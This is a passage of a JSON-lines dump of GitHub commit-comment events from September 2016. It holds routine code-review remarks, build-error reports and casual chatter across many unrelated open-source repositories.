weekend off, so maybe Tuesday would be a good day for that hangout."}},"created_at":"2016-09-04T01:09:21Z"}
{"id":"4513005806","type":"CommitCommentEvent","actor":{"login":"epinapala"},"repo":{"name":"epinapala/mafiabot"},"payload":{"comment":{"id":18891767,"position":23,"line":56,"path":"utils/helper.js","commit_id":"c5f68ce48b4e2fe573a88efc011923d3203a9dfa","created_at":"2016-09-04T01:14:02Z","updated_at":"2016-09-04T01:14:02Z","body":"We shall move the user comparision logic out of this function. This function would just build role list. It would be difficult to test independently as well cus getUsers would be null unless we mock it or set it before runningg the test."}},"created_at":"2016-09-04T01:14:02Z"}
{"id":"4513006275","type":"CommitCommentEvent","actor":{"login":"epinapala"},"repo":{"name":"epinapala/mafiabot"},"payload":{"comment":{"id":18891768,"position":null,"line":null,"path":null,"commit_id":"c5f68ce48b4e2fe573a88efc011923d3203a9dfa","created_at":"2016-09-04T01:14:35Z","updated_at":"2016-09-04T01:14:35Z","body":"Just run grunt test.  Grunt should take care of it"}},"created_at":"2016-09-04T01:14:35Z"}
{"id":"4513007485","type":"CommitCommentEvent","actor":{"login":"bndw"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18891769,"position":20,"line":20,"path":"cat.go","commit_id":"0bf45cfd7e60c82a6c406576e9ff996ddaecabcf","created_at":"2016-09-04T01:15:55Z","updated_at":"2016-09-04T01:15:55Z","body":"I used a raw string here so I could visually see the formatting."}},"created_at":"2016-09-04T01:15:55Z"}
{"id":"4513007720","type":"CommitCommentEvent","actor":{"login":"Vaelatern"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18891770,"position":null,"line":null,"path":null,"commit_id":"6a238f0c1a92f02475b02905fe366d9a8fd01ead","created_at":"2016-09-04T01:16:12Z","updated_at":"2016-09-04T01:16:12Z","body":"@pullmoll YAY!"}},"created_at":"2016-09-04T01:16:12Z"}
{"id":"4513015342","type":"CommitCommentEvent","actor":{"login":"mikefaille"},"repo":{"name":"ApplETS/ETSMobile-Android2"},"payload":{"comment":{"id":18891774,"position":null,"line":null,"path":null,"commit_id":"a51b89bfa0495583a21e0146270fc6e3f3bf4d5a","created_at":"2016-09-04T01:25:02Z","updated_at":"2016-09-04T01:25:02Z","body":"@gnut3ll4 Je te propose de retirer les binaires de git et d'utiliser graddle pour aller chercher le projet. Je pourrai de donner un coup de main pour gérer ça si tu veux."}},"created_at":"2016-09-04T01:25:02Z"}
{"id":"4513016447","type":"CommitCommentEvent","actor":{"login":"se7enack"},"repo":{"name":"se7enack/nodejs"},"payload":{"comment":{"id":18891775,"position":13,"line":0,"path":"passwordManager/app.js","commit_id":"5c0c43375caf5efc1414771e9065f6087ecc632d","created_at":"2016-09-04T01:26:29Z","updated_at":"2016-09-04T01:26:29Z","body":"Change these to your secret key."}},"created_at":"2016-09-04T01:26:29Z"}
{"id":"4513018126","type":"CommitCommentEvent","actor":{"login":"JasonPuglisi"},"repo":{"name":"JasonPuglisi/lastfm-now"},"payload":{"comment":{"id":18891776,"position":null,"line":null,"path":null,"commit_id":"7842e31019b2be3d88b5726fa8f2cc83390e6507","created_at":"2016-09-04T01:28:28Z","updated_at":"2016-09-04T01:28:28Z","body":"Implements #1 "}},"created_at":"2016-09-04T01:28:28Z"}
{"id":"4513018219","type":"CommitCommentEvent","actor":{"login":"gnut3ll4"},"repo":{"name":"ApplETS/ETSMobile-Android2"},"payload":{"comment":{"id":18891777,"position":null,"line":null,"path":null,"commit_id":"a51b89bfa0495583a21e0146270fc6e3f3bf4d5a","created_at":"2016-09-04T01:28:34Z","updated_at":"2016-09-04T01:28:34Z","body":"@mikefaille merci pour ton aide, j'ai justement retiré les jars dans ce commit pour résoudre par gradle, est-ce que tu vois d'autres améliorations?"}},"created_at":"2016-09-04T01:28:34Z"}
{"id":"4513025764","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18891787,"position":52,"line":87,"path":"utils/crypto.go","commit_id":"d0f1ce8a2c56040095942d239cd17ee4e6c52f83","created_at":"2016-09-04T01:36:52Z","updated_at":"2016-09-04T01:36:52Z","body":"Your old dict was missing the quote character `\"`"}},"created_at":"2016-09-04T01:36:52Z"}
{"id":"4513028343","type":"CommitCommentEvent","actor":{"login":"mikefaille"},"repo":{"name":"ApplETS/ETSMobile-Android2"},"payload":{"comment":{"id":18891788,"position":null,"line":null,"path":null,"commit_id":"a51b89bfa0495583a21e0146270fc6e3f3bf4d5a","created_at":"2016-09-04T01:39:54Z","updated_at":"2016-09-04T01:39:54Z","body":"En fait, les jar sont encore dans l'historique. Effectivement, ils sont retirés de ce commit. Par contre, il faudra réécrire l'historique pour enlever les jar de l'historique.\r\n\r\nPour faire ça, je te propose d'utiliser cet outil. Afin de démontrer qu'il est fiable, il est highlité dans la doc de github : https://rtyley.github.io/bfg-repo-cleaner/"}},"created_at":"2016-09-04T01:39:54Z"}
{"id":"4513031588","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18891789,"position":null,"line":null,"path":null,"commit_id":"530ed4b3b498ee95078522eb77b1377e3977ca49","created_at":"2016-09-04T01:43:21Z","updated_at":"2016-09-04T01:43:21Z","body":"The player near restriction was not present in 1051. It makes it impractical to deconstruct bases with friends if no other players can be within 10m while you are doing it.\r\n\r\nAnother possible solution is to move the isNull check into the faster 0.1s animation loop. That would make it very difficult to dupe via multiple players attempting deconstruction at the same time because it would abort when the object is deleted:\r\nhttps://github.com/EpochModTeam/DayZ-Epoch/blob/530ed4b3b498ee95078522eb77b1377e3977ca49/SQF/dayz_code/actions/remove.sqf#L89-L93\r\n\r\nSomething like a global setVariable of \"claimed\" on the object could also work, but is less than ideal."}},"created_at":"2016-09-04T01:43:21Z"}
{"id":"4513031705","type":"CommitCommentEvent","actor":{"login":"ocslegna"},"repo":{"name":"ocslegna/algorithms-and-data-structures-III"},"payload":{"comment":{"id":18891790,"position":31,"line":307,"path":"TP1/Ej1/AyC.cpp","commit_id":"632264c5b56a4a700143edbee23daf7f231facc0","created_at":"2016-09-04T01:43:29Z","updated_at":"2016-09-04T01:43:29Z","body":"Se estaba borrando el contenido, y no el iterador! El iterador borra contenido y linkea el resto."}},"created_at":"2016-09-04T01:43:29Z"}
{"id":"4513032452","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"mkaluza/Samsung_STE_Kernel"},"payload":{"comment":{"id":18891792,"position":null,"line":null,"path":null,"commit_id":"be6d5ad419c6f6d72ca83e135b7d15613ae0d36c","created_at":"2016-09-04T01:44:22Z","updated_at":"2016-09-04T01:44:22Z","body":"Whoaaaa jacked! (Figuratively, of course) Nice work on this and the fantasy profile.\nI wanna talk to you about some stuff...robpatershuk@gmail.com"}},"created_at":"2016-09-04T01:44:22Z"}
{"id":"4513034861","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/eventos-web"},"payload":{"comment":{"id":18891794,"position":1,"line":1,"path":"README.md","commit_id":"422d0bd5bf0df29f6e9238ce675595d7e04f1503","created_at":"2016-09-04T01:47:03Z","updated_at":"2016-09-04T01:47:03Z","body":"Commit referente a #7, #9 #8. Meu vim removeu a linha inteira porque # era usado para anotações"}},"created_at":"2016-09-04T01:47:03Z"}
{"id":"4513037399","type":"CommitCommentEvent","actor":{"login":"gnut3ll4"},"repo":{"name":"ApplETS/ETSMobile-Android2"},"payload":{"comment":{"id":18891798,"position":null,"line":null,"path":null,"commit_id":"a51b89bfa0495583a21e0146270fc6e3f3bf4d5a","created_at":"2016-09-04T01:49:47Z","updated_at":"2016-09-04T01:49:47Z","body":"J'ai utilisé cet outil par le passé pour nettoyer le repo des clefs en vue de le rendre open-source, c'est effectivement un très bon outil.\r\n\r\nMerci pour avoir repéré le problème de la taille de l'historique, j'ajoute ça aux issues, mais si jamais tu veux soumettre un fix tu es le bienvenu!"}},"created_at":"2016-09-04T01:49:47Z"}
{"id":"4513038376","type":"CommitCommentEvent","actor":{"login":"kou"},"repo":{"name":"groonga/heroku-groonga-builder"},"payload":{"comment":{"id":18891799,"position":null,"line":null,"path":null,"commit_id":"ed37c1bd8ca9a5da71b5d9cde711c13ce92f4166","created_at":"2016-09-04T01:50:55Z","updated_at":"2016-09-04T01:50:55Z","body":"If you use `--output`, `--remote-name` is meaningless. You can remove `--remote-name`."}},"created_at":"2016-09-04T01:50:55Z"}
{"id":"4513040225","type":"CommitCommentEvent","actor":{"login":"bobcao3"},"repo":{"name":"IcebergOS/Cryst"},"payload":{"comment":{"id":18891800,"position":null,"line":null,"path":null,"commit_id":"03136842fff1e1d045946a0e28e2815e1946ed6f","created_at":"2016-09-04T01:53:11Z","updated_at":"2016-09-04T01:53:11Z","body":"@satgo1546 \r\n历史性的时刻"}},"created_at":"2016-09-04T01:53:11Z"}
{"id":"4513040874","type":"CommitCommentEvent","actor":{"login":"dudeonthehorse"},"repo":{"name":"dudeonthehorse/kilogram"},"payload":{"comment":{"id":18891802,"position":null,"line":null,"path":null,"commit_id":"cf341a09ba6dc6d2e4cb01000515a9ebeeaceee1","created_at":"2016-09-04T01:53:55Z","updated_at":"2016-09-04T01:53:55Z","body":"https://mozilla.github.io/nunjucks/templating.html#macro"}},"created_at":"2016-09-04T01:53:55Z"}
{"id":"4513041489","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"osm0sis/GN-Synapse-Injector"},"payload":{"comment":{"id":18891803,"position":null,"line":null,"path":null,"commit_id":"1fc80aa84cf7ac2328b37f481ccfb218dd9ca68a","created_at":"2016-09-04T01:54:42Z","updated_at":"2016-09-04T01:54:42Z","body":"*sigh* Chris you beautiful bastard.  With this project and your genius implementation of shell variable scripting, you've managed to save my ass once again. Is there anything you can't do or should I get the cult started?"}},"created_at":"2016-09-04T01:54:42Z"}
{"id":"4513042457","type":"CommitCommentEvent","actor":{"login":"gauthamnair"},"repo":{"name":"priscole/GIS_Scripts"},"payload":{"comment":{"id":18891805,"position":13,"line":48,"path":"WetlandElevationChange.py","commit_id":"a9c1b33879d4975aba65210287ec161b57027d2a","created_at":"2016-09-04T01:55:52Z","updated_at":"2016-09-04T01:55:52Z","body":"rename 'myTable' to 'fileName' or something like that."}},"created_at":"2016-09-04T01:55:52Z"}
{"id":"4513042767","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18891806,"position":null,"line":null,"path":null,"commit_id":"8bcaee4f51a7842e76aceb87e2c073fd7988152a","created_at":"2016-09-04T01:56:16Z","updated_at":"2016-09-04T01:56:16Z","body":"Speaking of TI-Basic, I made my Symbolic Quadratic Formula Program DISPLAY ON ONE LINE...\r\nIT'S AMAZING. "}},"created_at":"2016-09-04T01:56:16Z"}
{"id":"4513042788","type":"CommitCommentEvent","actor":{"login":"gauthamnair"},"repo":{"name":"priscole/GIS_Scripts"},"payload":{"comment":{"id":18891807,"position":32,"line":58,"path":"WetlandElevationChange.py","commit_id":"a9c1b33879d4975aba65210287ec161b57027d2a","created_at":"2016-09-04T01:56:17Z","updated_at":"2016-09-04T01:56:17Z","body":"can delete this."}},"created_at":"2016-09-04T01:56:17Z"}
{"id":"4513043675","type":"CommitCommentEvent","actor":{"login":"gauthamnair"},"repo":{"name":"priscole/GIS_Scripts"},"payload":{"comment":{"id":18891810,"position":25,"line":25,"path":"metaDataFormat.py","commit_id":"a9c1b33879d4975aba65210287ec161b57027d2a","created_at":"2016-09-04T01:57:26Z","updated_at":"2016-09-04T01:57:26Z","body":"formatting suggests that this is indented with tabs rather than spaces. - convert to spaces if so."}},"created_at":"2016-09-04T01:57:26Z"}
{"id":"4513044982","type":"CommitCommentEvent","actor":{"login":"EpicSteve33"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18891813,"position":null,"line":null,"path":null,"commit_id":"efdb188eb154f87293e302044270cb33260c046d","created_at":"2016-09-04T01:59:08Z","updated_at":"2016-09-04T01:59:08Z","body":"I still crash lol"}},"created_at":"2016-09-04T01:59:08Z"}
{"id":"4513504322","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":18892596,"position":null,"line":null,"path":null,"commit_id":"78baaff23e51b194e33cbed38b29605186335b34","created_at":"2016-09-04T10:00:01Z","updated_at":"2016-09-04T10:00:01Z","body":"ok, thx\n"}},"created_at":"2016-09-04T10:00:01Z"}
{"id":"4513505105","type":"CommitCommentEvent","actor":{"login":"wsnipex"},"repo":{"name":"notspiff/inputstream.rtmp"},"payload":{"comment":{"id":18892600,"position":13,"line":13,"path":"depends/common/openssl/CMakeLists.txt","commit_id":"7bf2298ea83fdd480b47d8885ffce68cd0f75a86","created_at":"2016-09-04T10:00:22Z","updated_at":"2016-09-04T10:00:22Z","body":"I think this should be --with-zlib-lib\r\nerror from jenkins:\r\n>make[9]: Entering directory `/home/jenkins/workspace/Android-ARM/tools/depends/target/binary-addons/arm-linux-androideabi-android-17/build/openssl/src/openssl/crypto'\r\ngcc: error: unrecognized command line option '--with-zlib-dir=/home/jenkins/workspace/Android-ARM/tools/depends/target/binary-addons/arm-linux-androideabi-android-17/build/depends/lib'"}},"created_at":"2016-09-04T10:00:22Z"}
{"id":"4513505166","type":"CommitCommentEvent","actor":{"login":"lizmat"},"repo":{"name":"perl6/gtk-simple"},"payload":{"comment":{"id":18892601,"position":null,"line":null,"path":null,"commit_id":"8a6d92ac2a99fb742d3e5b9656632c7dd0f485ab","created_at":"2016-09-04T10:00:24Z","updated_at":"2016-09-04T10:00:24Z","body":"Afaik, you can put platform specific resources in a “platforms” directory, and then have a subdirectory for each platform.  And then just install files for that platform?\n\nOr is this about the need to download them?\n\nIf that is the case, then maybe the platform specific files should be in separate distributions, and somehow have a platform specific dependency injected at some point?\n\n> On 04 Sep 2016, at 11:46, Ahmad M. Zawawi <notifications@github.com> wrote:\n> \n> Actually this highlights another design problem with %?RESOURCES. It is not platform-specific. We are copying an empty DLL file to satisfy panda's appetite.\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2016-09-04T10:00:24Z"}
{"id":"4513506470","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18892614,"position":81,"line":60,"path":"youtube_dl/extractor/nytimes.py","commit_id":"4191779dcda8a80faf6e53579e011b63ee5c3878","created_at":"2016-09-04T10:01:29Z","updated_at":"2016-09-04T10:01:29Z","body":"the mpd manifest reports that it contain video with audio streams and audio only stream the same is reported by ffmpeg:\r\n```\r\nffprobe https://vp.nyt.com/video/2016/09/02/42387_1_02japan-robot_wg_dash/movie_3828kbps/segment0.mp4\r\nffprobe version 3.1.3 Copyright (c) 2007-2016 the FFmpeg developers\r\n  built with gcc 6.1.1 (GCC) 20160802\r\n  configuration: --prefix=/usr --disable-debug --disable-static --disable-stripping --enable-avisynth --enable-avresample --enable-fontconfig --enable-gmp --enable-gnutls --enable-gpl --enable-ladspa --enable-libass --enable-libbluray --enable-libfreetype --enable-libfribidi --enable-libgsm --enable-libiec61883 --enable-libmodplug --enable-libmp3lame --enable-libopencore_amrnb --enable-libopencore_amrwb --enable-libopenjpeg --enable-libopus --enable-libpulse --enable-libschroedinger --enable-libsoxr --enable-libspeex --enable-libssh --enable-libtheora --enable-libv4l2 --enable-libvidstab --enable-libvorbis --enable-libvpx --enable-libwebp --enable-libx264 --enable-libx265 --enable-libxvid --enable-netcdf --enable-shared --enable-version3 --enable-x11grab\r\n  libavutil      55. 28.100 / 55. 28.100\r\n  libavcodec     57. 48.101 / 57. 48.101\r\n  libavformat    57. 41.100 / 57. 41.100\r\n  libavdevice    57.  0.101 / 57.  0.101\r\n  libavfilter     6. 47.100 /  6. 47.100\r\n  libavresample   3.  0.  0 /  3.  0.  0\r\n  libswscale      4.  1.100 /  4.  1.100\r\n  libswresample   2.  1.100 /  2.  1.100\r\n  libpostproc    54.  0.100 / 54.  0.100\r\n[mov,mp4,m4a,3gp,3g2,mj2 @ 0x86f3020] stream 1, offset 0x298396: partial file\r\nInput #0, mov,mp4,m4a,3gp,3g2,mj2, from 'https://vp.nyt.com/video/2016/09/02/42387_1_02japan-robot_wg_dash/movie_3828kbps/segment0.mp4':\r\n  Metadata:\r\n    major_brand     : dash\r\n    minor_version   : 0\r\n    compatible_brands: isommp42\r\n    creation_time   : 2016-09-02 16:58:52\r\n  Duration: 00:00:03.02, start: 0.033356, bitrate: 3733 kb/s\r\n    Stream #0:0(und): Video: h264 (Main) (avc1 / 0x31637661), yuv420p(tv, bt709/bt709/unknown), 1920x1080 [SAR 1:1 DAR 16:9], 3613 kb/s, 29.97 fps, 29.97 tbr, 30k tbn, 59.94 tbc (default)\r\n    Metadata:\r\n      handler_name    : Telestream Inc. Telestream Media Framework - Local 99.99.999999\r\n      encoder         : AVC\r\n    Stream #0:1(eng): Audio: aac (mp4a / 0x6134706D), 44100 Hz, stereo, fltp, 127 kb/s (default)\r\n    Metadata:\r\n      handler_name    : Telestream Inc. Telestream Media Framework - Local 99.99.999999\r\n```\r\nbut trying to play the file return this errors and there is no sound:\r\n```\r\n[ffmpeg/demuxer] mov,mp4,m4a,3gp,3g2,mj2: stream 1, offset 0x298929: partial file\r\n[lavf] error reading packet.\r\n[ffmpeg/demuxer] mov,mp4,m4a,3gp,3g2,mj2: stream 1, offset 0x298aab: partial file\r\n[lavf] error reading packet.\r\n[ffmpeg/demuxer] mov,mp4,m4a,3gp,3g2,mj2: stream 1, offset 0x298c08: partial file\r\n[lavf] error reading packet.\r\n```"}},"created_at":"2016-09-04T10:01:29Z"}
{"id":"4513507037","type":"CommitCommentEvent","actor":{"login":"keshavbhatt"},"repo":{"name":"keshavbhatt/snapcraft-gui"},"payload":{"comment":{"id":18892615,"position":200,"line":758,"path":"snapcraft-qt/mainwindow.cpp","commit_id":"6e9c9312ef334e5d0668f3cea1c3ab02c2d802a7","created_at":"2016-09-04T10:02:00Z","updated_at":"2016-09-04T10:02:00Z","body":"**clean command implementation** "}},"created_at":"2016-09-04T10:02:00Z"}
{"id":"4513509080","type":"CommitCommentEvent","actor":{"login":"Nihhaar"},"repo":{"name":"Ferrari-Dev-Team/android_device_xiaomi_ferrari"},"payload":{"comment":{"id":18892617,"position":null,"line":null,"path":null,"commit_id":"88b7266d0137b75f9f0f2f7be8622f3ae4f0c016","created_at":"2016-09-04T10:03:59Z","updated_at":"2016-09-04T10:03:59Z","body":"This commit is giving me problems regarding qcmedia player one in device.mk when building exodus ROM.\r\nI've seen this commit : https://github.com/CyanogenMod/android_device_lge_g4-common/commit/5e45b71a06b36feafb3a3ce4fd63bfe236b21ab5 but didn't help. "}},"created_at":"2016-09-04T10:03:59Z"}
{"id":"4513510609","type":"CommitCommentEvent","actor":{"login":"alie9ja"},"repo":{"name":"alie9ja/alie9ja.github.io"},"payload":{"comment":{"id":18892618,"position":47,"line":43,"path":"_posts/2016-09-04-september-4-2016.markdown","commit_id":"61e2e73e4804a6b8000b205b1c36dfd4fddcc143","created_at":"2016-09-04T10:05:31Z","updated_at":"2016-09-04T10:05:31Z","body":"![photo1](https://www.dropbox.com/sc/0h9t3lktsafk1g3/AAAzKCTtAeuurjzO9Lgl3ioka)"}},"created_at":"2016-09-04T10:05:31Z"}
{"id":"4513511685","type":"CommitCommentEvent","actor":{"login":"webteckie"},"repo":{"name":"keystonejs/keystone-nightwatch-e2e"},"payload":{"comment":{"id":18892620,"position":109,"line":54,"path":"lib/src/pageObjects/adminUIListScreen.js","commit_id":"8024ef338abd1e5187e2d1e28fec069e04b1b7cf","created_at":"2016-09-04T10:06:34Z","updated_at":"2016-09-04T10:06:34Z","body":"Sp:  Itmes->Items"}},"created_at":"2016-09-04T10:06:34Z"}
{"id":"4513512575","type":"CommitCommentEvent","actor":{"login":"DimStar77"},"repo":{"name":"os-autoinst/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":18892622,"position":null,"line":null,"path":null,"commit_id":"ae987875aa3ecdb9fed31ee859c930550e692b4f","created_at":"2016-09-04T10:07:20Z","updated_at":"2016-09-04T10:07:20Z","body":"    if (get_var(\"UPGRADE\", \"LOW_SPACE\") ne \"LOW_SPACE\") {\r\n\r\nwhich hits everything that is not a low_space testing test"}},"created_at":"2016-09-04T10:07:20Z"}
{"id":"4513513913","type":"CommitCommentEvent","actor":{"login":"hermann0111"},"repo":{"name":"hermann0111/WazaTest"},"payload":{"comment":{"id":18892624,"position":null,"line":null,"path":null,"commit_id":"670749ae9740b13481d4e45fa38592a27944d609","created_at":"2016-09-04T10:08:44Z","updated_at":"2016-09-04T10:08:44Z","body":"Bon comment. Merci pour ce commit, tu as vraiment fait ce que tu dit là?"}},"created_at":"2016-09-04T10:08:44Z"}
{"id":"4513514673","type":"CommitCommentEvent","actor":{"login":"renbear67"},"repo":{"name":"sayterdarkwynd/FrackinUniverse"},"payload":{"comment":{"id":18892626,"position":4,"line":18,"path":"biomes/surface/protoworld.biome","commit_id":"423653940e55699ced7719f7b3a939dac68e7424","created_at":"2016-09-04T10:09:25Z","updated_at":"2016-09-04T10:09:25Z","body":"missing comma"}},"created_at":"2016-09-04T10:09:25Z"}
{"id":"4513521100","type":"CommitCommentEvent","actor":{"login":"1500WK1500"},"repo":{"name":"1500WK1500/u-boot-nexusS"},"payload":{"comment":{"id":18892633,"position":null,"line":null,"path":null,"commit_id":"ce2718b0330c50c20cde6eac8bb8259a4785d1f2","created_at":"2016-09-04T10:15:00Z","updated_at":"2016-09-04T10:15:00Z","body":"this fix #5 Issue"}},"created_at":"2016-09-04T10:15:00Z"}
{"id":"4513521557","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18892634,"position":81,"line":60,"path":"youtube_dl/extractor/nytimes.py","commit_id":"4191779dcda8a80faf6e53579e011b63ee5c3878","created_at":"2016-09-04T10:15:22Z","updated_at":"2016-09-04T10:15:22Z","body":"Got it. Or maybe NYTimes serves broken files."}},"created_at":"2016-09-04T10:15:22Z"}
{"id":"4513521648","type":"CommitCommentEvent","actor":{"login":"radusocaci"},"repo":{"name":"forit-brainiacs/flashcards"},"payload":{"comment":{"id":18892635,"position":null,"line":null,"path":null,"commit_id":"ad84bd915847cca04b27c9961dea1cbf1ba4a083","created_at":"2016-09-04T10:15:27Z","updated_at":"2016-09-04T10:15:27Z","body":"Pai nici mie nu imi arata ce-i da sa arate, idk why.."}},"created_at":"2016-09-04T10:15:27Z"}
{"id":"4513522313","type":"CommitCommentEvent","actor":{"login":"hermann0111"},"repo":{"name":"hermann0111/WazaTest"},"payload":{"comment":{"id":18892636,"position":null,"line":null,"path":null,"commit_id":"670749ae9740b13481d4e45fa38592a27944d609","created_at":"2016-09-04T10:16:05Z","updated_at":"2016-09-04T10:16:05Z","body":"Salut"}},"created_at":"2016-09-04T10:16:05Z"}
{"id":"4513523803","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":18892637,"position":3,"line":6,"path":"app/Resources/views/Frontend/credits.html.twig","commit_id":"b44b52e16e70b573d3ae9c962f2fea1afbe652a0","created_at":"2016-09-04T10:17:32Z","updated_at":"2016-09-04T10:17:32Z","body":"h1 hauria d'estar dins del div.col-..."}},"created_at":"2016-09-04T10:17:32Z"}
{"id":"4513525626","type":"CommitCommentEvent","actor":{"login":"Bhavithadaggula"},"repo":{"name":"Bhavithadaggula/Titanic-sinking-problem1"},"payload":{"comment":{"id":18892639,"position":null,"line":null,"path":null,"commit_id":"eaf9b010cee69280ce286ff6154b7b15461a6d6b","created_at":"2016-09-04T10:19:08Z","updated_at":"2016-09-04T10:19:08Z","body":"\r\n[titanic sinking problem.zip](https://github.com/Bhavithadaggula/Titanic-sinking-problem1/files/453880/titanic.sinking.problem.zip)\r\n\r\n\r\n"}},"created_at":"2016-09-04T10:19:08Z"}
{"id":"4513525730","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":18892640,"position":23,"line":7,"path":"app/Resources/views/Frontend/credits.html.twig","commit_id":"b44b52e16e70b573d3ae9c962f2fea1afbe652a0","created_at":"2016-09-04T10:19:14Z","updated_at":"2016-09-04T10:19:14Z","body":"A mida de pantalla petita (xs = extra small), o sigui smartphones, la taula hauria d'ocupar tot l'ample de la pantalla. Per tant, el col-xs hauria de ser 12 enlloc de 6... s'enten?"}},"created_at":"2016-09-04T10:19:14Z"}
{"id":"4513525821","type":"CommitCommentEvent","actor":{"login":"lofcz"},"repo":{"name":"lofcz/SimplexRpgEngine"},"payload":{"comment":{"id":18892641,"position":null,"line":null,"path":null,"commit_id":"e5c287d485dc2480fb3c1ac0d9186a901661c6fe","created_at":"2016-09-04T10:19:20Z","updated_at":"2016-09-04T10:19:20Z","body":"Opraven optionbox flickering, přidán autocompare, podpora kaskádových menu, opraveno automatické přizpůsobení délce popisných textů."}},"created_at":"2016-09-04T10:19:20Z"}
{"id":"4513525822","type":"CommitCommentEvent","actor":{"login":"niner"},"repo":{"name":"perl6/gtk-simple"},"payload":{"comment":{"id":18892642,"position":null,"line":null,"path":null,"commit_id":"8a6d92ac2a99fb742d3e5b9656632c7dd0f485ab","created_at":"2016-09-04T10:19:20Z","updated_at":"2016-09-04T10:19:20Z","body":"There's been lots of discussion this week about how a real configure/build system for Perl 6 could look like starting at http://irclog.perlgeek.de/perl6-toolchain/2016-08-29#i_13112051\r\n\r\nPlease join :)"}},"created_at":"2016-09-04T10:19:20Z"}
{"id":"4513525866","type":"CommitCommentEvent","actor":{"login":"Nihhaar"},"repo":{"name":"CyanogenMod/android_device_lge_g4-common"},"payload":{"comment":{"id":18892643,"position":null,"line":null,"path":null,"commit_id":"5e45b71a06b36feafb3a3ce4fd63bfe236b21ab5","created_at":"2016-09-04T10:19:22Z","updated_at":"2016-09-04T10:19:22Z","body":"I think libstagefright_soft_flacdec should also be removed."}},"created_at":"2016-09-04T10:19:22Z"}
{"id":"4513526021","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18892644,"position":null,"line":null,"path":null,"commit_id":"3b1abf55a2f581a5d9b7937908b385bf297de98b","created_at":"2016-09-04T10:19:31Z","updated_at":"2016-09-04T10:19:31Z","body":"better use templates\r\n```\r\nUnit.cpp:\r\n\r\ntemplate <class T>\r\nvoid Unit::RemoveAurasWithAttribute(T flags)\r\n{\r\n    for (SpellAuraHolderMap::iterator iter = m_spellAuraHolders.begin(); iter != m_spellAuraHolders.end();)\r\n    {\r\n        if (iter->second->GetSpellProto()->HasAttribute(T(flags)))\r\n        {\r\n            RemoveSpellAuraHolder(iter->second);\r\n            iter = m_spellAuraHolders.begin();\r\n        }\r\n        else\r\n            ++iter;\r\n    }\r\n}\r\n\r\ntemplate void Unit::RemoveAurasWithAttribute(SpellAttributes flags);\r\ntemplate void Unit::RemoveAurasWithAttribute(SpellAttributesEx flags);\r\ntemplate void Unit::RemoveAurasWithAttribute(SpellAttributesEx2 flags);\r\ntemplate void Unit::RemoveAurasWithAttribute(SpellAttributesEx3 flags);\r\ntemplate void Unit::RemoveAurasWithAttribute(SpellAttributesEx4 flags);\r\ntemplate void Unit::RemoveAurasWithAttribute(SpellAttributesEx5 flags);\r\ntemplate void Unit::RemoveAurasWithAttribute(SpellAttributesEx6 flags);\r\ntemplate void Unit::RemoveAurasWithAttribute(SpellAttributesEx7 flags);\r\n\r\nUnit.cpp:\r\n\r\n        template <class T>\r\n        void RemoveAurasWithAttribute(T flags);\r\n```"}},"created_at":"2016-09-04T10:19:31Z"}
{"id":"4513526139","type":"CommitCommentEvent","actor":{"login":"RogersSockeng"},"repo":{"name":"hermann0111/WazaTest"},"payload":{"comment":{"id":18892645,"position":null,"line":null,"path":null,"commit_id":"670749ae9740b13481d4e45fa38592a27944d609","created_at":"2016-09-04T10:19:38Z","updated_at":"2016-09-04T10:19:38Z","body":"Bon comment. Merci pour ce commit, tu as vraiment fait ce que tu dit là? || 😹😹😹, non non."}},"created_at":"2016-09-04T10:19:38Z"}
{"id":"4513526282","type":"CommitCommentEvent","actor":{"login":"RogersSockeng"},"repo":{"name":"hermann0111/WazaTest"},"payload":{"comment":{"id":18892647,"position":null,"line":null,"path":null,"commit_id":"670749ae9740b13481d4e45fa38592a27944d609","created_at":"2016-09-04T10:19:45Z","updated_at":"2016-09-04T10:19:45Z","body":"C'est comment ? "}},"created_at":"2016-09-04T10:19:45Z"}
{"id":"4513526636","type":"CommitCommentEvent","actor":{"login":"lofcz"},"repo":{"name":"lofcz/SimplexRpgEngine"},"payload":{"comment":{"id":18892648,"position":null,"line":null,"path":null,"commit_id":"e5c287d485dc2480fb3c1ac0d9186a901661c6fe","created_at":"2016-09-04T10:20:03Z","updated_at":"2016-09-04T10:20:03Z","body":"@VaclavVal  - Commit je potřeba otestovat, problémy přímo do issues. "}},"created_at":"2016-09-04T10:20:03Z"}
{"id":"4513529039","type":"CommitCommentEvent","actor":{"login":"azawawi"},"repo":{"name":"perl6/gtk-simple"},"payload":{"comment":{"id":18892651,"position":null,"line":null,"path":null,"commit_id":"8a6d92ac2a99fb742d3e5b9656632c7dd0f485ab","created_at":"2016-09-04T10:22:12Z","updated_at":"2016-09-04T10:22:12Z","body":"Perfect. Thanks for the link :+1: "}},"created_at":"2016-09-04T10:22:12Z"}
